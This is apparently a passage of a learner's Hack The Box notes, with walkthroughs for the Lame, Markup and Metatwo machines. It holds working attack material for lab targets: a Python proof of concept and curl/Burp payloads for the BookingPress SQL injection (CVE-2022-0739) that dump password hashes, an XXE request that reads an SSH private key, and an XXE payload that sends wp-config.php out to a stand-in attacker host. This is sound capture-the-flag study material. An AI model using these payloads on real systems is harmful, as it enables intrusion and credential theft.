                        PORT    STATE SERVICE     VERSION\n21/tcp  open  ftp         vsftpd 2.3.4\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 10.10.14.2\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      vsFTPd 2.3.4 - secure, fast, stable\n|_End of status\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n| ssh-hostkey: \n|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)\n|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)\n139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\nService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: mean: 2h00m28s, deviation: 2h49m43s, median: 27s\n| smb-os-discovery: \n|   OS: Unix (Samba 3.0.20-Debian)\n|   Computer name: lame\n|   NetBIOS computer name: \n|   Domain name: hackthebox.gr\n|   FQDN: lame.hackthebox.gr\n|_  System time: 2023-04-18T17:35:18-04:00\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 25444/tcp): CLEAN (Timeout)\n|   Check 2 (port 29825/tcp): CLEAN (Timeout)\n|   Check 3 (port 9648/udp): CLEAN (Timeout)\n|   Check 4 (port 21091/udp): CLEAN (Timeout)\n|_  0/4 checks are positive: Host is CLEAN or ports are blocked\n|_smb2-time: Protocol negotiation failed (SMB2)\n| smb-security-mode: \n|   account_used: <blank>\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 17:35\nCompleted NSE at 17:35, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 17:35\nCompleted NSE at 17:35, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 17:35\nCompleted NSE at 17:35, 0.00s elapsed\nRead data files from: /usr/bin/../share/nmap\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 69.50 seconds\n
                        ","tags":["walkthrough","smb vulnerability","metasploit"]},{"location":"htb-lame/#enumeration","title":"Enumeration","text":"

                        Samba smbd 3.0.20-Debian is vulnerable.

                        smbclient -L \\\\$IP\n

                        And enumerate shared resources:

                        smbmap -H $IP\n
                        [+] IP: 10.129.228.86:445       Name: unknown                                           \n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        print$                                                  NO ACCESS       Printer Drivers\n        tmp                                                     READ, WRITE     oh noes!\n        opt                                                     NO ACCESS\n        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))\n        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))\n

                        tmp share has READ and WRITE permissions.

                        msfconsole\nuse exploit/multi/samba/usermap_script\n# configure it and run it\n
                        ","tags":["walkthrough","smb vulnerability","metasploit"]},{"location":"htb-markup/","title":"Markup - A HTB machine","text":"
                        nmap -sC -A 10.129.95.192 -Pn \n

                        Open ports: 22, 80 and 443.

                        In the browser, there is a login panel. Try typical credentials. admin and password work.

                        Locate the form to order an item. Capture the request with burp:

                        POST /process.php HTTP/1.1\nHost: 10.129.95.192\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/xml\nContent-Length: 108\nOrigin: http://10.129.95.192\nConnection: close\nReferer: http://10.129.95.192/services.php\nCookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10\n\n<?xml version = \"1.0\"?><order><quantity>2</quantity><item>Home Appliances</item><address>1</address></order>\n

                        Playing around with the request (for instance, nesting some xml) you can check that it's possible to escape the xml tags. This request contains a xml external entity XEE vulnerability.

                        From some responses like the one below (and also from nmap scanning) you know that server runs on a windows:

                        :  DOMDocument::loadXML(): Opening and ending tag mismatch: order line 1 and item in Entity, line: 1 in <b>C:\\xampp\\htdocs\\process.php\n

                        Also, from source code you know there might be a user called daniel:

                        As part of a possible exploitation we could try to check if there are ssh private key saved in that user's folder.

                        POST /process.php HTTP/1.1\nHost: 10.129.95.192\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/xml\nContent-Length: 182\nOrigin: http://10.129.95.192\nConnection: close\nReferer: http://10.129.95.192/services.php\nCookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10\n\n<?xml version = \"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>\n<order><quantity>2</quantity><item>\n&test;\n</item><address>1</address></order>\n

                        The response will be id_rsa private key. More about XEE attacks.

                        Now, as port 22 was open:

                        ssh -i id_rsa daniel@10.129.95.192\n

                        user.txt is in Desktop.

                        ","tags":["walkthrough","windows","xxe"]},{"location":"htb-metatwo/","title":"Walkthrough - Metatwo, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-metatwo/#about-the-machine","title":"About the machine","text":"data Machine Metatwo Platform Hackthebox url link creator Naute OS Linux Release data 29 october 2022 Difficulty Easy Points 20 ip 10.10.11.186","tags":["walkthrough"]},{"location":"htb-metatwo/#getting-usertxt-flag","title":"Getting user.txt flag","text":"

                        Run:

                        export ip=10.10.11.186\n
                        ","tags":["walkthrough"]},{"location":"htb-metatwo/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"htb-metatwo/#active-scanning-serviceport-enumeration","title":"Active Scanning: Service/Port enumeration","text":"

                        Run nmap to enumerate open ports, services, OS, and traceroute. General enumeration not to make too much noise:

                        sudo nmap $ip -Pn\n

                        Results:

                        PORT   STATE SERVICE\n21/tcp open  ftp\n22/tcp open  ssh\n80/tcp open  http\n

                        Open 10.10.11.186 in the browser. A redirection to http://metapress.htb occurs, but the server is not found. So we add this routing in our /etc/hosts file:

                        Open the /etc/hosts file with an editor. For instance, nano.

                        sudo nano /etc/hosts\n

                        Move the cursor to the end and add these lines:

                        10.10.11.186    metapress.htb\n

                        Now we can visit the site. The first thing we notice is that it is a WordPress. That means we can use a tool such as wpscan to enumerate resources in the target. As we desire also to know the installed plugins, we will perform an aggressive scan with the flag --plugins-detection.

                        First, do the generic scan:

                        wpscan --url http://metapress.htb\n

                        Results:

                        _______________________________________________________________\n         __          _______   _____\n         \\ \\        / /  __ \\ / ____|\n          \\ \\  /\\  / /| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\/  \\/ / |  ___/ \\___ \\ / __|/ _` | '_ \\\n            \\  /\\  /  | |     ____) | (__| (_| | | | |\n             \\/  \\/   |_|    |_____/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.22\n       Sponsored by Automattic - https://automattic.com/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http://metapress.htb/ [10.10.11.186]\n[+] Started: Sun Nov 13 14:58:36 2022\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entries:\n |  - Server: nginx/1.18.0\n |  - X-Powered-By: PHP/8.0.24\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] robots.txt found: http://metapress.htb/robots.txt\n | Interesting Entries:\n |  - /wp-admin/\n |  - /wp-admin/admin-ajax.php\n | Found By: Robots Txt (Aggressive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http://metapress.htb/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http://codex.wordpress.org/XML-RPC_Pingback_API\n |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/\n |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/\n |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/\n |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/\n\n[+] WordPress readme found: http://metapress.htb/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http://metapress.htb/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https://www.iplocation.net/defend-wordpress-from-ddos\n |  - https://github.com/wpscanteam/wpscan/issues/1299\n\n[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).\n | Found By: Rss Generator (Passive Detection)\n |  - http://metapress.htb/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>\n |  - http://metapress.htb/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>\n\n[+] WordPress theme in use: twentytwentyone\n | Location: http://metapress.htb/wp-content/themes/twentytwentyone/\n | Last Updated: 2022-11-02T00:00:00.000Z\n | Readme: http://metapress.htb/wpcontent/themes/twentytwentyone/readme.txt\n | [!] The version is out of date, the latest version is 1.7\n | Style URL: http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1\n | Style Name: Twenty Twenty-One\n | Style URI: https://wordpress.org/themes/twentytwentyone/\n | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...\n | Author: the WordPress team\n | Author URI: https://wordpress.org/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n | Confirmed By: Css Style In 404 Page (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'\n\n[+] Enumerating All Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:11 <========================================================> (137 / 137) 100.00% Time: 00:00:11\n\n[i] No Config Backups Found.\n\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\n[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register\n

                        Two interesting facts that may come into use later are:

                        • WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
                        • X-Powered-By: PHP/8.0.24

                        So, we have a WordPress version 5.6.2 that is using a PHP version 8.0.24.

                        After this, use the aggressive method to scan plugins:

                        wpscan --url http://metapress.htb --enumerate vp --plugins-detection aggressive\n

                        Since this method is really slow, we have some spare time to have a look at the html code with the inspector tool in our browser. This specific line catches our attention:

                        <link rel=\"stylesheet\" id=\"bookingpress_fonts_css-css\" href=\"http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/css/fonts/fonts.css?ver=1.0.10\" media=\"all\">\n

                        Sweet. In a very easy way, we've been able to spot an installed plugin and its version: bookingpress version 1.0.10. If we browse the site it's easy to get to http://metapress.htb/events/. Bookingpress plugin version 1.0.10 is vulnerable, so next step will be exploitation.

                        ","tags":["walkthrough"]},{"location":"htb-metatwo/#initial-access","title":"Initial access","text":"

                        By searching for \"bookingpress 1.0.10\" in google, we can learn that there is a critical vulnerability associated with the plugin BookingPress version under 1.0.11.

                        Description of CVE-2022-0739: The plugin fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection.

                        We are going to exploit the vulnerability in three different ways:

                        • Using a python script.
                        • Using the curl command.
                        • Using a capture in Burp Suite.

                        We will leave out of this write-up the tool sqlmap, that authomatizes the attack. Let's get dirty hands with code.

                        Python script There is a git repo that exploits CVE-2022-0739.

                        Let's see the python script:

                        import requests\nfrom json import loads\nfrom random import randint\nfrom argparse import ArgumentParser\n\np = ArgumentParser()\np.add_argument('-u', '--url', dest='url', help='URL of wordpress server with vulnerable plugin (http://example.domain)', required=True)\np.add_argument('-n', '--nonce', dest='nonce', help='Nonce that you got as unauthenticated user', required=True)\n\ntrigger = \") UNION ALL SELECT @@VERSION,2,3,4,5,6,7,count(*),9 from wp_users-- -\"\ngainer = ') UNION ALL SELECT user_login,user_email,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users limit 1 offset {off}-- -'\n\n# Payload: ) AND ... -- - total(9)\ndef gen_payload(nonce, sqli_postfix, category_id=1):\n    return { \n        'action': 'bookingpress_front_get_category_services', # vulnerable action,\n        '_wpnonce': nonce,\n        'category_id': category_id,\n        'total_service': f'{randint(100, 10000)}{sqli_postfix}'\n    }\n\nif __name__ == '__main__':  \n    print('- BookingPress PoC')\n    i = 0\n    args = p.parse_args()\n    url, nonce = args.url, args.nonce\n    pool = requests.session()\n\n\n    # Check if the target is vulnerable\n    v_url = f'{url}/wp-admin/admin-ajax.php'\n    proof_payload = gen_payload(nonce, trigger)\n\n    res = pool.post(v_url, data=proof_payload)\n    try:\n        res = list(loads(res.text)[0].values())\n    except Exception as e:\n        print('-- Got junk... Plugin not vulnerable or nonce is incorrect')\n        exit(-1)\n    cnt = int(res[7])\n\n    # Capture hashes\n    print('-- Got db fingerprint: ', res[0])\n    print('-- Count of users: ', cnt)\n    for i in range(cnt):\n        try:\n            # Generate payload\n            user_payload = gen_payload(nonce, gainer.format(off=i))\n            u_data = list(loads(pool.post(v_url, user_payload).text)[0].values())\n            print(f'|{u_data[0]}|{u_data[1]}|{u_data[2]}|')\n        except: continue \n

                        Create a python script called bookingpress.py and give it execution permission:

                        sudo nano bookingpress.py\n# Now we paste the code and save changes with CTRL-X and Yes.\nchmod +x bookingpress.py\n

                        Bookingpress.py requires two arguments. First is \"url\" and second in \"nonce\". Wpnonce is generated during the registration of an event in the browser. To obtain it, book a spot in the calendar and capture that with BurpSuite. Here is the traffic intercepted:

                        POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 95\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=akporp33a92q48gn0afe6akrkt\n\naction=bookingpress_front_get_timings&service_id=1&selected_date=2022-11-21&_wpnonce=f26ed88649\n

                        Now execute the script:

                        python bookingpress.py -u metapress.htb -n f26ed88649\n

                        And results:

                        - BookingPress PoC\n-- Got db fingerprint:  10.5.15-MariaDB-0+deb11u1\n-- Count of users:  2\n|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.|\n|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70|\n

                        Curl command Also, we could use the following command:

                        curl -i 'http://metapress.htb/wp-admin/admin-ajax.php'   --data 'action=bookingpress_front_get_category_services&_wpnonce=f26ed88649&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'\n

                        If you use it, remember to change the value of the NONCE parameter. Mine was f26ed88649.

                        Capturing the request with Burp

                        First, capture a request for an appointment booking with Burp Suite:

                        POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 1054\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d\n\naction=bookingpress_before_book_appointment&appointment_data[selected_category]=1&appointment_data[selected_cat_name]=&appointment_data[selected_service]=1&appointment_data[selected_service_name]=Startupmeeting&appointment_data[selected_service_price]=$0.00&appointment_data[service_price_without_currency]=0'-7502)+UNION+ALL+SELECT+group_concat(user_login),group_concat(user_pass),%40%40version_compile_os,1,2,3,4,5,6+from+wp_users--+-'&appointment_data[selected_date]=2022-11-15&appointment_data[selected_start_time]=10:00&appointment_data[selected_end_time]=10:30&appointment_data[customer_name]=&appointment_data[customer_firstname]=lolo&appointment_data[customer_lastname]=lolo&appointment_data[customer_phone]=7777777777&appointment_data[customer_email]=lolo@lolo.com&appointment_data[appointment_note]=<script>alert(1)</script>&appointment_data[selected_payment_method]=&appointment_data[customer_phone_country]=US&appointment_data[total_services]=&appointment_data[stime]=1668426666&appointment_data[spam_captcha]=In6ygQvJD9EB&_wpnonce=da775e35c6\n

                        As you can see in the captured traffic, since I restarted my machine due to non related issues, my wpnonce has shifted from f26ed88649 to da775e35c6. Send this request to the Repeater module (CTRL-R) and play with it. After a while testing it, I could craft this request:

                        POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 112\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1;--+-'\n

                        For that, we have this response:

                        HTTP/1.1 200 OK\nServer: nginx/1.18.0\nDate: Mon, 14 Nov 2022 08:20:06 GMT\nContent-Type: text/html; charset=UTF-8\nConnection: close\nX-Powered-By: PHP/8.0.24\nAccess-Control-Allow-Origin: http://metapress.htb\nAccess-Control-Allow-Credentials: true\nX-Robots-Tag: noindex\nX-Content-Type-Options: nosniff\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\nCache-Control: no-cache, must-revalidate, max-age=0\nX-Frame-Options: SAMEORIGIN\nReferrer-Policy: strict-origin-when-cross-origin\nContent-Length: 553\n\n[{\"bookingpress_service_id\":\"1\",\"bookingpress_category_id\":\"1\",\"bookingpress_service_name\":\"Startup meeting\",\"bookingpress_service_price\":\"$0.00\",\"bookingpress_service_duration_val\":\"30\",\"bookingpress_service_duration_unit\":\"m\",\"bookingpress_service_description\":\"Join us, we will celebrate our startup!\",\"bookingpress_service_position\":\"0\",\"bookingpress_servicedate_created\":\"2022-06-23 18:02:38\",\"service_price_without_currency\":0,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"}]\n

                        Cool. Let's now check what happens when you use this payload:

                        HTTP/1.1 200 OK\nServer: nginx/1.18.0\nDate: Mon, 14 Nov 2022 08:22:46 GMT\nContent-Type: text/html; charset=UTF-8\nConnection: close\nX-Powered-By: PHP/8.0.24\nAccess-Control-Allow-Origin: http://metapress.htb\nAccess-Control-Allow-Credentials: true\nX-Robots-Tag: noindex\nX-Content-Type-Options: nosniff\nExpires: Wed, 11 Jan 1984 05:00:00 GMT\nCache-Control: no-cache, must-revalidate, max-age=0\nX-Frame-Options: SAMEORIGIN\nReferrer-Policy: strict-origin-when-cross-origin\nContent-Length: 2\n\n[]\n

                        So, when the condition is false (1=2), we are having a different response from the server. This proves that we are facing a SQL Injection vulnerability.

                        Also, we could run a scanner with the tool sqlmap to see if this request is vulnerable. Save this request in a file (in my case I will call it bookrequest:

                        POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: metapress.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 112\nOrigin: http://metapress.htb\nConnection: close\nReferer: http://metapress.htb/events/\nCookie: PHPSESSID=1gj5nr7mj3do8f4jr4j5dh0e9d\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9\n

                        Now run sqlmap:

                        sqlmap -r bookrequest\n

                        Extract from the results:

                        [03:30:05] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable\nPOST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N] \nsqlmap identified the following injection point(s) with a total of 436 HTTP(s) requests:\n---\nParameter: total_service (POST)\n    Type: time-based blind\n    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9) AND (SELECT 2533 FROM (SELECT(SLEEP(5)))kDHj) AND (2027=2027\n\n    Type: UNION query\n    Title: Generic UNION query (NULL) - 9 columns\n    Payload: action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a717071,0x467874624e5a4862654847417a50625064757853724c584c57504443685668756446725643566d56,0x7171627a71),NULL,NULL-- -\n---\n[03:30:17] [INFO] the back-end DBMS is MySQL\nweb application technology: Nginx 1.18.0, PHP 8.0.24\nback-end DBMS: MySQL >= 5.0.12 (MariaDB fork)\n[03:30:17] [WARNING] HTTP error codes detected during run:\n400 (Bad Request) - 123 times\n[03:30:17] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/metapress.htb'\n

                        This saves us some time. Now we know there are two SQLi vulnerabilities. The first is a time-based blind one. And the second one is a SQL injection based on a UNION QUERY. Also, we know the query is on a table with 9 columns, being the seventh one the injectable.

                        We could have also used the Repeater module in Burp Suite and sent a request for 9 columns and for 10 columns (I will only paste the payload):

                        # payload of 9 columns. In case of an empty response, the table would have 8 columns.\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1+order+by+9;--+-\n\n# payload of 10 columns. In case of an empty response, the table would have 9 columns.\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+OR+1=1+order+by+10;--+-\n

                        Since we have an empty response with 10 columns we can conclude that the table has 9 columns.

                        To get which columns are being displayed, use this payload:

                        action=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+all+1,2,3,4,5,6,7,8,9;--+-\n

                        In the body of the response, we obtain:

                        [{\"bookingpress_service_id\":\"1\",\"bookingpress_category_id\":\"2\",\"bookingpress_service_name\":\"3\",\"bookingpress_service_price\":\"$4.00\",\"bookingpress_service_duration_val\":\"5\",\"bookingpress_service_duration_unit\":\"6\",\"bookingpress_service_description\":\"7\",\"bookingpress_service_position\":\"8\",\"bookingpress_servicedate_created\":\"9\",\"service_price_without_currency\":4,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"}]\n

                        All of the columns are being displayed, and this makes sense since it is a UNION query.

                        Now we are ready to perfom our attack using Burpsuite. These would be the succesive payloads:

                        # 1. Get the names of the databases:\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+table_schema,null,null,null,null,null,null,null,null+FROM+information_schema.tables;--+-\n\n# Body of the response:\n\n[{\"bookingpress_service_id\":\"information_schema\",\"bookingpress_category_id\":null,\"bookingpress_service_name\":null,\"bookingpress_service_price\":\"$0.00\",\"bookingpress_service_duration_val\":null,\"bookingpress_service_duration_unit\":null,\"bookingpress_service_description\":null,\"bookingpress_service_position\":null,\"bookingpress_servicedate_created\":null,\"service_price_without_currency\":0,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"},{\"bookingpress_service_id\":\"blog\",\"bookingpress_category_id\":null,\"bookingpress_service_name\":null,\"bookingpress_service_price\":\"$0.00\",\"bookingpress_service_duration_val\":null,\"bookingpress_service_duration_unit\":null,\"bookingpress_service_description\":null,\"bookingpress_service_position\":null,\"bookingpress_servicedate_created\":null,\"service_price_without_currency\":0,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"}]\n\n# 2. Get the names of all tables from the selected database:\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+table_name,null,null,null,null,null,null,null,null+FROM+information_schema.tables+WHERE+table_schema=blog;--+-\n\n# But since we are having some issues when using \"WHERE\" we will dump the database. \n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+null,null,null,null,null,null,null,null,table_name+FROM+information_Schema.tables;--+-\n\n# This will give us an extended response from where we need to read and select the interesting table. We will use filters in BurpSuite to locate all results related to USERS. And, as matter of fact we can locate a specific table (the common one in WordPress, by the way): wp_users. We will use this later.\n\n# 3. Get the name of all columns of a selected table from a selected database. But since we are having problems using WHERE, we will dump all columns names:\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+column_name,null,null,null,null,null,null,null,null+FROM+information_schema.columns;--+-\n\n# Again, the response is vast. We can use Burpsuite filter to find these two colums: user_pass and user_login\n\n# 4. Now we can query the two columns we want (user_login and user_pass) from the table wp_users:\n\naction=bookingpress_front_get_category_services&_wpnonce=da775e35c6&category_id=33&total_service=9)+UNION+SELECT+user_login,user_pass,null,null,null,null,null,null,null+FROM+wp_users;--+-\n\n# And the body response:\n\n[{\"bookingpress_service_id\":\"admin\",\"bookingpress_category_id\":\"$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.\",\"bookingpress_service_name\":null,\"bookingpress_service_price\":\"$0.00\",\"bookingpress_service_duration_val\":null,\"bookingpress_service_duration_unit\":null,\"bookingpress_service_description\":null,\"bookingpress_service_position\":null,\"bookingpress_servicedate_created\":null,\"service_price_without_currency\":0,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"},{\"bookingpress_service_id\":\"manager\",\"bookingpress_category_id\":\"$P$B4aNM28N0E.tMy\\/JIcnVMZbGcU16Q70\",\"bookingpress_service_name\":null,\"bookingpress_service_price\":\"$0.00\",\"bookingpress_service_duration_val\":null,\"bookingpress_service_duration_unit\":null,\"bookingpress_service_description\":null,\"bookingpress_service_position\":null,\"bookingpress_servicedate_created\":null,\"service_price_without_currency\":0,\"img_url\":\"http:\\/\\/metapress.htb\\/wp-content\\/plugins\\/bookingpress-appointment-booking\\/images\\/placeholder-img.jpg\"}]\n

                        Same results:

                        user_login user_pass admin $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. manager $P$B4aNM28N0E.tMy\\/JIcnVMZbGcU16Q70

                        We are going to use the tool JohnTheRipper and the dictionary rockyou.txt to crack the hash.

                        Let's first create the file book.hash with the hashes we just found.

                        nano book.hash\n

                        We copy paste the hashes in different lines:

                        ``` $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. $P$B4aNM28N0E.tMy\\/JIcnVMZbGcU16Q70

                        Press CTRL-X and enter Yes.\n\nNow run johntheripper:\n\n\n```bash\njohn -w=/usr/share/wordlists/rockyou.txt book.hash \n

                        Results:

                        \n

                        Log in into http://metapress.htb/wp-admin with the credentials of manager. After doing so, we realize that manager is a limited user. It does not have admin rights, ok, but the user manager can upload media.

                        After a little bit of research (reading documentation from wpscan.com we can see that it exists a specific vulnerability for:

                        • a logged user who has enabled media uploading.
                        • wordpress version 5.6.2
                        • PHP version 8

                        Since, our user falls into those parameters let's going to read a little bit more about that vulnerability. Read here. Quoting:

                        Description: A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress used an audio parsing library called ID3 that was affected by an XML External Entity (XXE) vulnerability affecting PHP versions 8 and above. This particular vulnerability could be triggered when parsing WAVE audio files. Researchers at security firm SonarSource discovered this XML external entity injection (XXE) security flaw in the WordPress Media Library.

                        Impact:

                        • Arbitrary File Disclosure: The contents of any file on the host\u2019s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
                        • Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

                        This is my first XXE attack! And it's also a pending subject for me because I was asked about it in a job interview for a pentester position and I didn't know how to answer. Great! No pain. Let's get our hands dirty =)

                        Wpscan provides us with a Proof Of Concept (POC):

                        1. Create payload.wav:
                        RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [\n\n<!ELEMENT r ANY >\n\n<!ENTITY % sp SYSTEM \"http://attacker-url.domain/xxe.dtd\">\n\n%sp;\n\n%param1;\n\n]>\n\n<r>&exfil;</r>>\n
                        1. Create xxe.dtd, the file we're going to serve:
                        <!ENTITY % data SYSTEM \"php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php\">\n\n<!ENTITY % param1 \"<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>\">\n

                        My IP is 10.10.14.33 and I will be using port 1234 and \"xxe.dtd\" as the name of the file in my server, so payload.wav would be (using flag -en to encode characters):

